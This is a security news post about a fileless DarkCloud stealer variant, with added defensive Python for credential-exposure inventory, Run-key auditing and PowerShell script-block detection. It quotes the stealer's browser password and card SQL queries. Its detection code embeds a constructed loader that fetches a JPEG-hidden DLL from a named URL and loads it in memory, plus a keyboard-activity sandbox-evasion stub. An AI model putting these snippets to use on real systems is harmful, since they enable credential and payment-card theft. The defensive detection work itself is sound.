Cyber Web Spider Blog – News

New Windows-Based DarkCloud Stealer Attacking Computers to Steal Login Credentials and Financial Data

Posted on August 8, 2025 by CWS

A sophisticated new variant of the DarkCloud data stealer has emerged in the cyber threat landscape, targeting Windows users through carefully crafted phishing campaigns designed to harvest sensitive credentials and financial data.

This fileless malware variant represents a significant evolution in stealer tooling, employing advanced evasion techniques and multi-stage deployment mechanisms that make detection particularly challenging for traditional security solutions.

The campaign begins with deceptive phishing emails containing RAR archives disguised as urgent business quotes.

When victims extract and execute the JavaScript file named “Quote #S_260627.js,” the malware initiates a complex infection chain that ultimately deploys the DarkCloud payload without leaving traditional file signatures on the compromised system.

New DarkCloud variant infection chain (Source – Fortinet)

The attack vector leverages social engineering tactics, presenting seemingly legitimate business communications that prompt users to open malicious attachments.

Fortinet analysts identified this new DarkCloud variant in early July 2025, noting its sophisticated use of process hollowing techniques and fileless deployment methods.

The researchers observed that this campaign specifically targets saved login credentials, payment card information, and contact lists stored across multiple popular applications, including web browsers, email clients, and FTP software.

The malware demonstrates particular sophistication in its data harvesting capabilities, targeting major web browsers such as Google Chrome, Microsoft Edge, Mozilla Firefox, and Brave Browser.

It executes specific SQL queries against the browsers' SQLite databases to extract sensitive information: SELECT origin_url, username_value, password_value FROM logins for credential harvesting, and SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards for financial data extraction.
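The two queries above are the same ones a responder can run to measure what an infection exposed. The following is an added example (not code from the article or from Fortinet) that builds a constructed, cut-down copy of the two Chromium profile databases those queries target ("Login Data" and "Web Data"), runs the stealer's exact queries against copies of them, and reports counts, origins and the encryption wrapper on each stored secret without decrypting anything. The sample origins, usernames and blob contents are invented; the table layouts are reduced to the queried columns and are not the full Chromium schema.

```python
import json
import os
import shutil
import sqlite3
import tempfile
from contextlib import closing

# Constructed, cut-down versions of the two Chromium profile databases the
# stealer queries. Only the columns named in the article's queries (plus a
# timestamp) are modelled; real "Login Data"/"Web Data" files have many more.
LOGINS_DDL = """
CREATE TABLE logins (
    origin_url VARCHAR NOT NULL,
    username_value VARCHAR,
    password_value BLOB,
    date_created INTEGER NOT NULL
);
"""
CARDS_DDL = """
CREATE TABLE credit_cards (
    name_on_card VARCHAR,
    expiration_month INTEGER,
    expiration_year INTEGER,
    card_number_encrypted BLOB
);
"""

# The two queries quoted in the article, verbatim.
LOGINS_QUERY = "SELECT origin_url, username_value, password_value FROM logins"
CARDS_QUERY = ("SELECT name_on_card, expiration_month, expiration_year, "
               "card_number_encrypted FROM credit_cards")


def build_sample_profile(profile_dir):
    """Write a constructed profile with three saved logins and one card (sample data)."""
    with closing(sqlite3.connect(os.path.join(profile_dir, "Login Data"))) as con, con:
        con.executescript(LOGINS_DDL)
        con.executemany("INSERT INTO logins VALUES (?, ?, ?, ?)", [
            ("https://mail.example.com/login", "alice", b"v10" + bytes(40), 1),
            ("https://bank.example.net/", "alice.c", b"v20" + bytes(40), 2),
            ("https://old.example.org/", "legacy", b"\x01\x00\x00\x00" + bytes(20), 3),
        ])
    with closing(sqlite3.connect(os.path.join(profile_dir, "Web Data"))) as con, con:
        con.executescript(CARDS_DDL)
        con.execute("INSERT INTO credit_cards VALUES (?, ?, ?, ?)",
                    ("ALICE C", 11, 2027, b"v10" + bytes(30)))


def classify_blob(blob):
    """Label the wrapper on a Chromium secret so the analyst knows what a thief
    still needs: 'v10' = AES-256-GCM with the key stored (DPAPI-protected) in the
    profile's Local State, unwrappable by any process running as that user;
    'v20' = Chrome's newer app-bound encryption; anything else is treated as a
    legacy or unknown layout."""
    head = (blob or b"")[:3]
    if head == b"v10":
        return "v10"
    if head == b"v20":
        return "v20"
    return "other"


def inventory(profile_dir):
    """Run the stealer's queries against copies of the profile databases and
    summarize the exposure without decrypting anything."""
    summary = {"logins": 0, "cards": 0, "origins": [], "wrappers": {}}
    with tempfile.TemporaryDirectory() as scratch:
        for filename, query in (("Login Data", LOGINS_QUERY), ("Web Data", CARDS_QUERY)):
            src = os.path.join(profile_dir, filename)
            if not os.path.exists(src):
                continue
            # A running browser keeps these files locked, so stealers and
            # forensic tooling alike work on a copy.
            copy = shutil.copy(src, os.path.join(scratch, filename))
            with closing(sqlite3.connect(copy)) as con:
                rows = con.execute(query).fetchall()
            if filename == "Login Data":
                summary["logins"] = len(rows)
                summary["origins"] = sorted({url for url, _, _ in rows})
                for _, _, blob in rows:
                    kind = classify_blob(blob)
                    summary["wrappers"][kind] = summary["wrappers"].get(kind, 0) + 1
            else:
                summary["cards"] = len(rows)
    return summary


def demo():
    """Build the constructed profile in a scratch directory and inventory it."""
    with tempfile.TemporaryDirectory() as profile_dir:
        build_sample_profile(profile_dir)
        return inventory(profile_dir)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Point inventory() at a real profile directory (for example `%LOCALAPPDATA%\Google\Chrome\User Data\Default`) to list which origins had saved credentials on an infected host and therefore need rotation; copy the `-journal`/`-wal` sidecar files alongside the database if they exist, or recently saved entries may be missing from the copy.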

Advanced Persistence and Evasion Mechanisms

The DarkCloud variant employs multiple sophisticated techniques to maintain persistence and evade detection on infected systems.

Upon successful execution, the malware establishes persistence by copying the initial JavaScript file to C:\Users\Public\Downloads\edriophthalma.js and creating an auto-run registry entry under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.

View of the disguised JPEG file (Source – Fortinet)

This ensures the malware runs again each time the user logs on, maintaining its presence across reboots.
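A Run-key entry that launches a script from a world-writable directory is the kind of thing a triage script should flag without needing a hash of the sample. The following is an added example (not code from the article or from Fortinet) that parses the text produced by `reg export` for a Run key and flags values that invoke a script host, reference a script file extension, or point into user-writable locations. The export is constructed here to mirror the persistence described above; the value names ("edriophthalma", "Updater") and the benign "OneDrive" entry are assumptions, since the article gives only the key and the dropped file path.

```python
import re

# Constructed sample in the format written by
#   reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg
# Value names are assumed; the article names only the key and the .js path.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"edriophthalma"="wscript.exe \"C:\\Users\\Public\\Downloads\\edriophthalma.js\""
"Updater"="C:\\Users\\Public\\Downloads\\edriophthalma.js"
'''

# "name"="data" lines; names may themselves contain escaped quotes.
VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<data>.*)$')

# Interpreters that turn a plain file into code at logon.
SCRIPT_HOSTS = re.compile(
    r"\b(wscript|cscript|mshta|powershell|pwsh|rundll32|regsvr32)(\.exe)?\b", re.I)
# Script file types that run via their default file association.
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf|wsh|hta|ps1|bat|cmd)\b", re.I)
# Locations any user (or any low-privileged process) can write to.
USER_WRITABLE = re.compile(
    r"\\Users\\Public\\|\\AppData\\Local\\Temp\\|\\Downloads\\|\\ProgramData\\", re.I)


def parse_reg_values(text):
    """Yield (key, name, data) for REG_SZ values in a .reg export.
    hex:/dword: values are skipped; .reg escapes (\\\\ and \\") are undone."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        raw = m.group("data")
        if not (raw.startswith('"') and raw.endswith('"')):
            continue
        data = re.sub(r"\\(.)", r"\1", raw[1:-1])
        yield key, m.group("name"), data


def audit_run_values(text):
    """Return the Run-key values worth a closer look, with the reasons."""
    findings = []
    for key, name, data in parse_reg_values(text):
        reasons = []
        if SCRIPT_HOSTS.search(data):
            reasons.append("script-host")
        if SCRIPT_EXT.search(data):
            reasons.append("script-extension")
        if USER_WRITABLE.search(data):
            reasons.append("user-writable-path")
        if reasons:
            findings.append({"key": key, "name": name, "command": data, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_run_values(SAMPLE_REG):
        print(f["name"], "->", f["command"], f["reasons"])
```

The same function works unchanged on exports of HKLM\...\Run, the RunOnce keys and the Wow6432Node variants, since it keys off the command text rather than the key path; a bare `.js` path with no interpreter is still flagged, because wscript.exe is the default handler for that extension.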

The most notable technical advancement in this variant lies in its fileless deployment strategy.

The malware downloads a seemingly innocuous JPEG image from archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg that actually contains an encrypted .NET DLL embedded within its pixel data.

The PowerShell component extracts this hidden payload by parsing the image file and loading the assembly directly into memory using [Reflection.Assembly]::Load(), so the decrypted DLL never touches disk.

To evade automated analysis systems, DarkCloud implements anti-sandbox techniques that monitor user interaction through the GetAsyncKeyState() API.

The malware remains dormant until it detects actual keyboard or mouse activity, effectively bypassing sandboxed environments that lack genuine user interaction.

This behavioral analysis evasion represents a significant challenge for automated security testing platforms.
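Because the DLL is loaded straight from memory, the file-based signatures the article mentions never fire; what does survive is the PowerShell text itself, which Windows records in event 4104 (Microsoft-Windows-PowerShell/Operational) when Script Block Logging is enabled. The following is an added example (not code from the article or from Fortinet) that scores such script blocks for the stages described in the two passages above: the image download, the pixel-level carving, the [Reflection.Assembly]::Load() call, and a GetAsyncKeyState-based activity probe. The three script blocks are constructed; the variable names, the System.Drawing-based decoding and the PowerShell form of the GetAsyncKeyState check are assumptions about how such a loader might look, not the actual DarkCloud code.

```python
import re

# Constructed script-block text of the kind recorded in event 4104. MALICIOUS
# mirrors the stages the article describes; its variable names and the
# per-pixel decoding are assumptions, not the real loader.
MALICIOUS = r'''
$u = 'https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg'
$img = (New-Object Net.WebClient).DownloadData($u)
Add-Type -AssemblyName System.Drawing
$bmp = New-Object System.Drawing.Bitmap (New-Object IO.MemoryStream(,$img))
# ... encrypted DLL bytes recovered from $bmp.GetPixel(...) and decrypted into $dll ...
$asm = [Reflection.Assembly]::Load($dll)
$asm.GetType('Loader').GetMethod('Run').Invoke($null, $null)
'''

# A stage that only waits for keyboard activity: the GetAsyncKeyState check the
# article attributes to DarkCloud, written here as an assumed PowerShell stub.
PROBE_ONLY = r'''
$sig = '[DllImport("user32.dll")] public static extern short GetAsyncKeyState(int vKey);'
$k = Add-Type -MemberDefinition $sig -Name Probe -Namespace W -PassThru
do { Start-Sleep -Seconds 5 } until ((1..254 | Where-Object { $k::GetAsyncKeyState($_) -band 0x8000 }))
'''

# Ordinary administrative activity that must not be flagged.
BENIGN = r'''
Get-ChildItem -Path C:\Logs -Filter *.log | Sort-Object LastWriteTime -Descending | Select-Object -First 10
Invoke-WebRequest -Uri https://www.example.com/status -OutFile C:\Temp\status.txt
'''

# (name, regex, weight). PowerShell is case-insensitive, so matching is too.
INDICATORS = (
    ("reflective-load",     r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(", 4),
    ("download-bytes",      r"\.Download(?:Data|String|File)\s*\(", 2),
    ("image-url",           r"https?://\S+?\.jpe?g\b", 1),
    ("image-decode",        r"System\.Drawing\.Bitmap|\.GetPixel\s*\(", 2),
    ("base64-decode",       r"FromBase64String\s*\(", 1),
    ("assembly-invoke",     r"\.GetMethod\s*\([^)]*\)\.Invoke\s*\(", 2),
    ("user-activity-probe", r"GetAsyncKeyState", 3),
)
THRESHOLD = 5  # a single weak indicator never alerts on its own


def score_script_block(text):
    """Return (score, [matched indicator names]) for one 4104 script block."""
    hits = [name for name, pattern, _ in INDICATORS
            if re.search(pattern, text, re.IGNORECASE)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def triage(blocks):
    """blocks: {label: script_text}. Return (label, score, hits) for every block
    at or above THRESHOLD, highest score first."""
    scored = [(label, *score_script_block(text)) for label, text in blocks.items()]
    scored.sort(key=lambda t: -t[1])
    return [entry for entry in scored if entry[1] >= THRESHOLD]


if __name__ == "__main__":
    for label, score, hits in triage({"benign": BENIGN, "probe": PROBE_ONLY, "loader": MALICIOUS}):
        print(f"{label}: score={score} {hits}")
```

Long scripts are split across several 4104 events that share a ScriptBlockId, so join the MessageNumber fragments before scoring; and since script block logging records a block as it executes, text assembled at runtime and handed to Invoke-Expression is logged in its deobfuscated form. The activity probe scores below the threshold on its own because it is also common in legitimate idle-detection code, and if DarkCloud performs that check inside the .NET DLL rather than in PowerShell, the 4104 channel will not see it at all; the reflective load is the reliable signal.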
